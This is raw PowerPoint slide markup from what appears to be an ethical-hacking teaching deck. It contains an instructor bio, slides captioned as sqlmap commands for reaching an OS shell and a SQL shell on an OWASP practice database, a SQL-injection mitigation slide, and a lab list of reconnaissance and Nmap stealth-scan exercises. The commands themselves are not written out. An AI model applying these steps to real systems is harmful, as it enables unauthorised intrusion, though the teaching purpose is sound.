          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>PhD from Gran Sasso Science Institute, Italy </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>PhD Supervisor Prof Paolo Prinetto from Politecnico Di Torino, World Rank 13 in Electrical Engineering </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>MTech from Indian Institute of Information Technology, Gwalior </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Visited 41 Countries Across The Globe</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Written 200+ Research paper with 193 Researcher from 63 Universities </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Scopus Profile: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roma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https://www.scopus.com/authid/detail.uri?authorId=57203239026</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Google Scholar: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>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https://scholar.google.com/citations?user=UZ_8yAMAAAAJ&amp;hl=hi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IBM Certified Solution Designer</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>EC-Council Certified Ethical Hacker</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Qualified GATE 4 times</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Email: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>dr.pandey@ieee.org</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="202" name="Google Shape;202;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7715256" y="0"/>
            <a:ext cx="1428750" cy="1512801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Google Shape;203;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="378350" y="204525"/>
            <a:ext cx="6442200" cy="53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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ABOUT ME</a:t>
            </a:r>
            <a:endParaRPr sz="3000" b="1"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1"/>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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="325" name="Google Shape;325;p51"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="14030" t="13524" r="40914" b="20276"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1164175" y="1017725"/>
            <a:ext cx="6117149" cy="3905351"/>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3706"/>
            <a:ext cx="9144000" cy="4325209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326301866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4948"/>
            <a:ext cx="9144000" cy="3996436"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523982" y="441789"/>
            <a:ext cx="3467616" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Command to see columns in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> owasp10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="232916907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116"/>
            <a:ext cx="9144000" cy="4719268"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31474710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6868"/>
            <a:ext cx="9144000" cy="3780678"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328773" y="297951"/>
            <a:ext cx="3119765" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>command to get into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34226416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57" y="719192"/>
            <a:ext cx="8712485" cy="4099388"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="311678407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8368"/>
            <a:ext cx="9144000" cy="4243015"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719191" y="287676"/>
            <a:ext cx="3199915" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>command to get into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31124141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56" y="1099335"/>
            <a:ext cx="8774131" cy="3842536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="123069" y="339047"/>
            <a:ext cx="8959504" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By this command we are inside the target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> shell , by running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> commands we can see everything whatever</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>nside the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> database server as shown in fig </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="158052028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pic>
        <p:nvPicPr>
          <p:cNvPr id="1477" name="Google Shape;1477;p213"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2499912" y="1310665"/>
            <a:ext cx="5428411" cy="3031845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1478" name="Google Shape;1478;p213"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="3200"/>
            <a:ext cx="7414200" cy="8100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en" b="1"/>
              <a:t>MITIGATION TECHNIQUE OF SQLI</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1479" name="Google Shape;1479;p213"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4929188" y="214313"/>
            <a:ext cx="1543200" cy="2055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207</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1480" name="Google Shape;1480;p213"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-2730446">
            <a:off x="-211267" y="2423981"/>
            <a:ext cx="2036516" cy="1238202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1481" name="Google Shape;1481;p213"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7497198" y="-13996"/>
            <a:ext cx="1646801" cy="335322"/>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214"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264600" y="804325"/>
            <a:ext cx="8614800" cy="446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64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>2. Performing Automated Network Reconnaissance Using Recon-ng</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3. Collecting Information from Social Networking Sites Using Recon-ng Pushpin</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4. Full Scan, Half Open Scan and Stealth scan, Xmas scan …. Using NMAP and store scanning results in different Format</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
